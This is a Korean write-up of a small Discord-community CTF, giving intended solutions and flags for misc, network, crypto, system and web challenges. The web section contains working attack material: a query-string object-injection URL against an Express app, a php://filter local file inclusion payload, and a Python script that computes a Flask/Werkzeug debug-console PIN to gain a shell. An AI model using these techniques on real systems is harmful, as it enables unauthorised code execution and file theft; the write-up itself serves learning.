MiniCTF Write-Up
약 3일간 한국 디스코드봇 리스트 디스코드내에서 재미삼아 조그만한 CTF를 진행해보았습니다.
생각보다 많은 분들이 참여해주셔서 감사드립니다 ^^
- 해당 풀이 방법은 의도한 풀이방법입니다.
- 해당 풀이와 다를 수는 있지만, 완전 방법이 다를 경우 틀린 풀이일 수 있습니다.
질문 있으시면 DM(wonderlandpark#9999) 주세요.
Misc
Hello, CTF
문제의 주석에 플래그가 있습니다.
FLAG: IU{Th1s_1s_My_F14g}
너의 의미
이미지 뒤쪽에 플래그가 있다. 텍스트 에디터나 strings
명령어 등을 사용하면 된다.
FLAG: IU{H1dden1nJpG}
임포스터
exiftool을 이용하여 파일들을 뒤적여준다.
그럼 간단하게 1.jpg 파일에 zip 파일이 포함되어있는걸 확인할 수 있다.
imposter binwalk -e 1.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v1.0 to extract, compressed size: 18, uncompressed size: 18, name: FLAG
154 0x9A End of Zip archive, footer length: 22
binwalk을 이용하여 압축을 풀어줍니다.
플래그가 짠!
FLAG: IU{A11_crewmates}
오늘 저녁은 민트초코
exiftool로 분석한 결과 zip 파일이 짠
생겨난 zip 파일에 암호를 입력하라고 하는데 해당 zip 파일명을 base64로 디코딩해주면 Kore4nb0ts
라는 값이 나온다.
이를 암호로 입력해주면 플래그 파일에서 값을 확인할 수 있다.
FLAG: IU{Fi1eH2dden1nDoc}
화가난 솔로
URL로 접속하면 다음과 같이 표시된다.
PRI
http://dontgo.wonder.im
PRI는 HTTP METHOD중에 하나로 잘 쓰이진 않는다.
이로 보았을때 PRI Method로 요청을 보내보자.
curl -X PRI http://dontgo.wonder.im
WONDER
자칫 이값이 플래그라고 생각할 수 있지만 명심하자 플래그는 형식이 정해져있다.
curl -X WONDER http://dontgo.wonder.im
IUISBEST_
curl -X IUISBEST_ http://dontgo.wonder.im
IU-YOU_GOT_IT-
이 낚시에도 낚이면 안된다
curl -X IU-REAL_FLAG- http://dontgo.wonder.im
IU-REAL_FLAG-
한 번 더!
curl -X IU-REAL_FLAG- http://dontgo.wonder.im
VTFaV04xWkhhR3hZZWtab1l6TlNabEpxUm1oYU16QTk=
나온 값을 base64로 3번 디코딩해준다.
FLAG: IU{The_1ast_F1ag}
Network
고양이
nc wargame.wonder.im 1234
netcat을 이용하여 접속하면 플래그를 준다.
FLAG: IU{you_Know_h0w_T0_U$e_netcat}
Crypto
그 사람 나를 보아도 어떤건지 몰라요
rot 10
FLAG: IU{1m_rot_sixteen}
모솔의 노트
모솔의 노트에 적혀있는건 도깨비 글자이다.
힌트에 도깨비 OST도 올려져있기에 찾는건 그리 어렵지 않을거라고 생각했다.
위 이미지를 대입해준다.
아이 유 아이 에스 비 이 에스 티
플래그는 다음과 같다.
FLAG: IU{iuisbest}
system
basic
#include <stdio.h>
#include <stdlib.h>
int main(void){
printf("나는 멋지다");
char flag[50]="IU{HIDDEN}";
write(5,flag,sizeof(flag));
return 0;
}
소스코드를 보자
write()
함수를 사용하여 file descriptor에 써주고 있다.
따라서 다음과 같이 file descriptor를 리다이랙션 시켜주면 된다.
./basic 5>&1
5번 file descriptor를 1번(stdout)으로
FLAG: IU{fi1e_desCript0realF1ag}
web
Tim Cook, 질소를 샀더니
각각 쿠키 값을 읽어주면 된다.
FLAG: IU{mintchoco_is_better_than_cookie}
and
IU{Tastyyyyyyy_cooook12s}
반드시 너를 찾을게 플래그 ⭐
const express = require('express')
const app = express()
const port = 3000
const FLAG = 'HIDDEN'
app.get('/', (req, res) => {
if(!req.query.name) return res.send('No Name')
if(req.query.name.length == -1) return res.send(FLAG)
res.send(`Hello, ${req.query.name}`)
})
app.listen(port, () => {
console.log(`I'm Ready`)
})
소스코드는 위와 같다.
name이라는 쿼리 스트링에서 length
라는 property가 -1 이면 플래그를 보내준다.
하지만 텍스트의 길이는 음수가 될 수 없다.
따라서 이건 쿼리 스트링으로 오브젝트를 보내줘야한다
http://express.wonder.im/?name[length]=-1
FLAG: IU{Querystring_1s_n0t_$afe}
나는 그 소스를 몰라요
사이트에 접속해주면 alert가 반겨준다.
실제로 100000번을 따라하면 되지만 그건 현명하지 못한 아이디어다.
먼저, curl이나 wget, view-source 등을 이용하여 소스코드를 확인한다.
<html>
<head>
<meta charset="utf8">
</head>
<body> 멋진 문제네요 </body>
<script>
// ...
</script>
</html>
스크립트 태그 안에는 난독화 되어있는 소스코드가 있다.
이걸 분석할 필요가 없다.
위에 다음과 같이 선언해준다.
const alert = console.log
const prompt = (text) => text
다음과 같이 선언해주면 alert 대신 콘솔에 로그가 될테고, prompt 함수는 무조건 입력값이 반환값이 되도록해주면 모든 값이 true가 되어 100000번 입력할 필요가 없다.
Upload
플래그 값이 0.5초도 걸리지 않고 나온다 짠~
FLAG: IU{Th1s1sTheRe4lF1ag}
오늘도 즐거운 백엔드 개발~
해당 문제는 Flask의 디버그 모드가 켜져있어 디버그 핀을 가져오면 된다.
디버그 핀을 가져오기 위해서 Werkzeung 코드를 분석해보길 바란다.
해당 블로그에 자세히 나와있다.
그냥 브라우저로 요청하면 ../../
와 같은것들을 전부 마음대로 바꿔버리기에 node-fetch
등의 모듈을 사용하여 요청해주어야한다.
FROM python:3.8
EXPOSE 8000
RUN adduser --disabled-password happyctf
ADD ./server /server
WORKDIR /server
RUN pip install -r requirements.txt
USER happyctf
ENTRYPOINT ["python"]
CMD ["app.py"]
도커 파일을 확인해보면 유저명은 happyctf 이며 파이썬 버전은 3.8이다.
MAC 주소를 숫자로 변환해준다
machine-id를 가져온다.
도커에서 돌아가고 있기에 cgroup 정보도 가져와야한다.
import hashlib
from itertools import chain
probably_public_bits = [
'happyctf', # username
'flask.app',# modname 고정
'Flask', # getattr(app, '__name__', getattr(app.__class__, '__name__')) 고정
'/usr/local/lib/python3.8/site-packages/flask/app.py' # getattr(mod, '__file__', None),
# python 버전 마다 위치 다름
]
private_bits = [
'2485377892354', # MAC주소를 int형으로 변환한 값,
'3766705eb195582e8168a9a1b913c7c77ea03280bece2c1c200fcc821a634f8c460fafb2bd3def7007f69c3556fd19d3' # get_machine_id()
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
위 스크립트를 실행해준다.
나온 핀 코드로 쉘에 로그인해준다.
로그인 한 뒤 마음대로 스크립트를 실행하여 플래그를 확인한다.
FLAG: IU{s2cr2t_2xp1o1t}
솔로의 파일 저장소
결론부터 말하겠다.
http://solonote.wonder.im/?page=php://filter/convert.base64-encode/resource=../files/flag
<html>
<head>
<title>솔로의 파일 저장소</title>
</head>
<body>
<h1>솔로의 파일 저장소</h1>
<div>
<?php
ini_set('display_errors', 'Off');
include $_GET['page']?$_GET['page'].'.php':'main.php';
?>
</div>
</body>
</html>
파일을 보면 include를 사용하고 있다. include는 굉장히 취약하다. 따라서 php filter를 사용하여 파일을 base64로 인코드한 값으로 가져올 수 있다.
PD9waHAKCSRmbGFnID0gJ0lVe3BocC1maTF0ZXIteWVlZX0nOwo/PgrtlIzrnpjqt7jripQgJGZsYWfsl5DsmpQuIOq0gOyLrOuyleycvOuhnCDrs7TrqbQg65Cg6rG47JqUPwo=
해당값을 디코딩해주면
<?php
$flag = 'IU{php-fi1ter-yeee}';
?>
플래그는 $flag에요. 관심법으로 보면 될걸요?
FLAG: IU{php-fi1ter-yeee}
마무리
참여해주신 여러분께 감사드립니다.
다시 돌아올 수 있다면 다시 돌아오겠습니다